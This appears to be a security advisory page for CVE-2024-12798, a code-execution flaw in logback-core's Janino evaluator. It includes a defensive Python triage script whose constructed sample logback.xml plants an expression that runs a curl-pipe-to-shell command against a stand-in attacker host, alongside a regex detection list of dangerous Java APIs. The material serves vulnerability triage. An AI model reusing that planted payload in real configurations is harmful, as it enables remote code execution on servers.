logback-core JaninoEventEvaluator Arbitrary Code Execution Vulnerability
CVE-2024-12798 Published on December 19, 2024
JaninoEventEvaluator vulnerability
An arbitrary code execution (ACE) vulnerability in JaninoEventEvaluator, shipped in QOS.CH logback-core versions 0.1 up to and including 1.3.14 and 1.4.0 up to and including 1.5.12, allows an attacker to execute arbitrary code in Java applications by compromising an existing
logback configuration file or by injecting an environment variable
before the program starts.
A malicious logback configuration file can give the attacker arbitrary code execution through the JaninoEventEvaluator extension: the Java source placed in an evaluator's <expression> element is compiled at runtime with Janino and evaluated against logging events, so whatever it contains runs inside the application's JVM with the application's privileges.
A successful attack requires the attacker to have write access to a
configuration file that the application loads. Alternatively, the attacker could inject a malicious
environment variable pointing to a malicious configuration file. In both
cases, the attack requires privilege the attacker already holds on the host, which is why the impact is limited to escalation from file-write or process-environment control to code execution.
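A practitioner who has to triage this advisory wants two checks: is the deployed logback-core in one of the affected ranges, and does any configuration file the application could load carry a Janino expression that does more than filter events. The following added example (written for this page, not code from stack.watch or the logback project) does both over a constructed logback.xml. It assumes the inclusive affected ranges listed on this page, that an <evaluator> element with no class attribute defaults to ch.qos.logback.classic.boolex.JaninoEventEvaluator (logback-classic's documented default), and a hand-picked, heuristic list of Java APIs that have no place in a log filter expression.

```python
# Added triage helper for CVE-2024-12798; not code from stack.watch or logback.
# Assumptions: affected ranges as listed on this page; an <evaluator> without a class
# attribute defaults to JaninoEventEvaluator; the SUSPICIOUS list is a heuristic.
import re
import xml.etree.ElementTree as ET

JANINO_EVALUATOR = "ch.qos.logback.classic.boolex.JaninoEventEvaluator"

# Inclusive affected ranges as listed on this page: 0.1..1.3.14 and 1.4.0..1.5.12.
AFFECTED_RANGES = [((0, 1, 0), (1, 3, 14)), ((1, 4, 0), (1, 5, 12))]

# Java APIs that should never appear in a log-filtering expression (heuristic, constructed).
SUSPICIOUS = re.compile(
    r"Runtime\.getRuntime|ProcessBuilder|Class\.forName|java\.io\.|java\.net\.|"
    r"java\.nio\.|javax\.script|System\.(?:exit|load|setProperty)|ScriptEngine"
)


def parse_version(version):
    """'1.5.12-SNAPSHOT' -> (1, 5, 12); missing components are padded with zeros."""
    core = version.split("-")[0]
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * (3 - len(parts))


def is_affected(version):
    """True if the logback-core version falls inside an affected range on this page."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def find_janino_expressions(xml_text):
    """Return every expression Janino would compile: <evaluator> elements that either
    name JaninoEventEvaluator explicitly or omit the class attribute (the default)."""
    root = ET.fromstring(xml_text)
    found = []
    for ev in root.iter("evaluator"):
        cls = ev.get("class")
        if cls is not None and cls != JANINO_EVALUATOR:
            continue  # e.g. OnMarkerEvaluator: no Java compilation involved
        expr_el = ev.find("expression")
        expr = (expr_el.text or "").strip() if expr_el is not None else ""
        found.append({
            "name": ev.get("name", "<anonymous>"),
            "explicit_class": cls is not None,
            "expression": expr,
            "suspicious": sorted(set(SUSPICIOUS.findall(expr))),
        })
    return found


def triage(version, xml_text):
    """Combine the version check with the config scan into one verdict."""
    hits = find_janino_expressions(xml_text)
    return {
        "version_affected": is_affected(version),
        "janino_expressions": len(hits),
        "flagged": [h for h in hits if h["suspicious"]],
    }


# Constructed sample: one benign Janino filter, one planted by an attacker (no class
# attribute, so it still goes through Janino), and one non-Janino evaluator to skip.
SAMPLE_CONFIG = """<configuration>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator class="ch.qos.logback.classic.boolex.JaninoEventEvaluator">
        <expression>return level &gt;= WARN;</expression>
      </evaluator>
      <OnMismatch>DENY</OnMismatch>
      <OnMatch>NEUTRAL</OnMatch>
    </filter>
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator>
        <expression>Runtime.getRuntime().exec("curl http://attacker.example/x | sh"); return true;</expression>
      </evaluator>
      <OnMatch>NEUTRAL</OnMatch>
    </filter>
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator class="ch.qos.logback.classic.boolex.OnMarkerEvaluator">
        <marker>AUDIT</marker>
      </evaluator>
      <OnMatch>ACCEPT</OnMatch>
    </filter>
    <encoder><pattern>%d %-5level %msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>
"""

if __name__ == "__main__":
    print(triage("1.5.12", SAMPLE_CONFIG))
```

Run the scan over every file logback-classic would consult (logback-test.xml and logback.xml on the classpath, plus anything named by the logback.configurationFile system property). For a running JVM, `jcmd <pid> VM.system_properties` shows whether that property has been overridden, which is the injection path the advisory describes. A flagged expression is evidence of the attack, not of the vulnerability; the version check alone decides whether to upgrade to 1.3.15 or 1.5.13.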
Weakness Type
What is an EL Injection Vulnerability?
The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify the intended EL statement before it is executed.
CVE-2024-12798 has been classified as an EL Injection vulnerability or weakness (CWE-917). In this case the injected language is Java itself: the attacker-controlled <expression> text is compiled and executed rather than treated as data.
Products Associated with CVE-2024-12798
Affected Versions
QOS.CH Sarl logback-core:
- Versions 0.1 through 1.3.14 (inclusive) are affected.
- Versions 1.4.0 through 1.5.12 (inclusive) are affected.
- Version 1.3.15 is unaffected.
- Version 1.5.13 is unaffected.
Exploit Probability
EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.